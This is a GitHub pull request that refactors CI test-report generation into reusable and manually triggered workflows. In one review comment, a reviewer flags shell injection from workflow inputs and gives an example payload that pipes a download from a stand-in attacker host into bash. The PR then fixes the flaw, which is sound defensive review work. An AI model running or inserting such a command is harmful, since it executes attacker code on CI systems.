[CI] Extract reports into reusable workflow and add manual reports di…#6360
[CI] Extract reports into reusable workflow and add manual reports di…#6360vlad-penkin wants to merge 6 commits intomainfrom
Conversation
There was a problem hiding this comment.
Pull request overview
This PR refactors CI reporting by extracting the report-generation logic into a dedicated reusable workflow, and adds a manual workflow to generate (and optionally compare) reports for any GitHub Actions run ID.
Changes:
- Added a new reusable workflow (
reports-reusable.yml) to generate pass-rate and multiple pre-baked stats views, plus optional cross-run comparisons. - Added a manual
workflow_dispatchentrypoint (reports-manual.yml) to download artifacts for an arbitrary run ID and invoke the reusable reports workflow. - Updated
build-test-reusable.ymlto call the new reusable reports workflow instead of running the reports steps inline.
Reviewed changes
Copilot reviewed 3 out of 3 changed files in this pull request and generated 3 comments.
| File | Description |
|---|---|
| .github/workflows/reports-reusable.yml | New reusable reports workflow with stats generation, optional comparison download/compare, and artifact uploads. |
| .github/workflows/reports-manual.yml | New manual workflow that downloads reports for a specified run ID and triggers the reusable reporting workflow. |
| .github/workflows/build-test-reusable.yml | Replaces the inline reports job with a call to reports-reusable.yml. |
You can also share your feedback on Copilot code review. Take the survey.
|
Can you describe the problem that you are trying to solve with this PR? There is no link to an issue here and the purpose of this change is not obvious. |
See linked issue for more details. The core motivation is to remove user friction and improve dev productivity while using triton_utils package by addressing the following concerns:
|
…spatch - Extract the inline reports job from build-test-reusable.yml into a new reports-reusable.yml workflow with 6 pre-baked stats views (testsuite/test x name/skipped/time sorting) - Add optional comparison support (compare_run_id) for diffing against historical CI runs - Add reports-manual.yml for on-demand report generation from any GH Actions run ID, with optional cross-run comparison Co-Authored-By: Claude Opus 4.6 (1M context) <[email protected]>
Co-authored-by: Copilot Autofix powered by AI <[email protected]>
Co-authored-by: Copilot Autofix powered by AI <[email protected]>
Co-authored-by: Copilot Autofix powered by AI <[email protected]>
vlad-penkin
force-pushed
the
vlad-penkin/reusable-reports-wf
branch
from
3c0093b to
2b51645
Compare
januszjah
left a comment
januszjah
left a comment
There was a problem hiding this comment.
There are shell-injections points, they should be removed. The issue is real, not some agent noise as it is mentioned explicitly in GH docs -> https://docs.github.com/en/actions/concepts/security/script-injections
.github/workflows/reports-manual.yml
Outdated
| set -euo pipefail | ||
| args=( | ||
| download | ||
| --run "${{ inputs.gh_run_id }}" |
There was a problem hiding this comment.
Shell injection: gh_run_id, repo, branch are interpolated directly into the run: block
${{ inputs.gh_run_id }}, ${{ inputs.repo }}, and ${{ inputs.branch }} are expanded by GitHub Actions before bash sees the script. A workflow_dispatch user with write access could enter e.g. "; curl attacker.com/pwn | bash # as a run ID and it would execute.
artifact_pattern was correctly moved to env: (line 69) — apply the same fix here:
env:
ARTIFACT_PATTERN: ${{ inputs.artifact_pattern }}
GH_RUN_ID: ${{ inputs.gh_run_id }}
REPO: ${{ inputs.repo }}
BRANCH: ${{ inputs.branch }}
run: |
set -euo pipefail
args=(
download
--run "$GH_RUN_ID"
-R "$REPO"
-B "$BRANCH"
-D reports
)
Same pattern applies to two other sites:
- reports-reusable.yml:110–115 — ${{ inputs.reports_dir }} (×4 interpolations in shell)
- reports-reusable.yml:164–166 — ${{ inputs.compare_run_id }}, compare_repo, compare_branch
These are fed from this workflow's with: block (line 97–99), so the injection chain is: workflow_dispatch input → with: → reusable workflow ${{ inputs.* }} → shell.There was a problem hiding this comment.
Fixed — moved all ${{ inputs.* }} interpolations to env: blocks across all 3 sites:
reports-manual.yml:gh_run_id,repo,branchreports-reusable.yml:reports_dir(4 interpolations)reports-reusable.yml:compare_run_id,compare_repo,compare_branch
artifact_pattern was already safe (line 69). Thanks for catching this.
|
This pending report check looks like some GHA bug, when you were modifying these files it registered new |
Move ${{ inputs.* }} interpolations from run: blocks to env: blocks
to prevent shell injection via workflow_dispatch inputs.
Fixes 3 injection sites flagged by @januszjah:
- reports-manual.yml: gh_run_id, repo, branch
- reports-reusable.yml: reports_dir (×4 interpolations)
- reports-reusable.yml: compare_run_id, compare_repo, compare_branch
Co-Authored-By: Claude Opus 4.6 (1M context) <[email protected]>
There was a problem hiding this comment.
Pull request overview
Refactors CI report generation into a reusable workflow and adds a manually triggered workflow to generate (and optionally compare) test report summaries from arbitrary GitHub Actions run IDs.
Changes:
- Added a new reusable workflow (
reports-reusable.yml) that generates multiple pre-bakedtriton-utilsstats views, pass rate JSON, and optional cross-run comparisons. - Added a manual workflow (
reports-manual.yml) to download reports for any run ID and invoke the reusable reports workflow. - Updated
build-test-reusable.ymlto call the new reusable reports workflow instead of running inline report steps.
Reviewed changes
Copilot reviewed 3 out of 3 changed files in this pull request and generated no comments.
| File | Description |
|---|---|
| .github/workflows/reports-reusable.yml | New reusable workflow for downloading reports, generating stats/pass-rate outputs, optional comparisons, and uploading derived artifacts. |
| .github/workflows/reports-manual.yml | New workflow_dispatch entrypoint for on-demand report generation from a provided run ID (with optional comparison). |
| .github/workflows/build-test-reusable.yml | Replaces the inline “reports” job steps with a reusable-workflow invocation. |
januszjah
left a comment
januszjah
left a comment
There was a problem hiding this comment.
Ok, just minor issue in secondary functionality.
| compare_repo: | ||
| description: Repository for the comparison run | ||
| type: string | ||
| default: "intel/intel-xpu-backend-for-triton" |
There was a problem hiding this comment.
Note: github.token is scoped to the current repository only — cross-repo artifact downloads will 403. This works fine with the default (intel/intel-xpu-backend-for-triton) but if a different repo is needed, a PAT with actions:read on the target repo must be provided.
Copy the reports-reusable.yml pattern (pass_rate, stats by testsuite and test at multiple sort orders) directly into the vllm-tests reports job. Will be replaced with uses: reports-reusable.yml after #6360 merges. Co-authored-by: Claude Opus 4.6 (1M context) <[email protected]>
Resolved merge conflict in build-test-reusable.yml by keeping the reusable workflow call (which already has all features from main's inline version plus additional comparison functionality). Co-Authored-By: Claude Sonnet 4.5 <[email protected]>
…spatch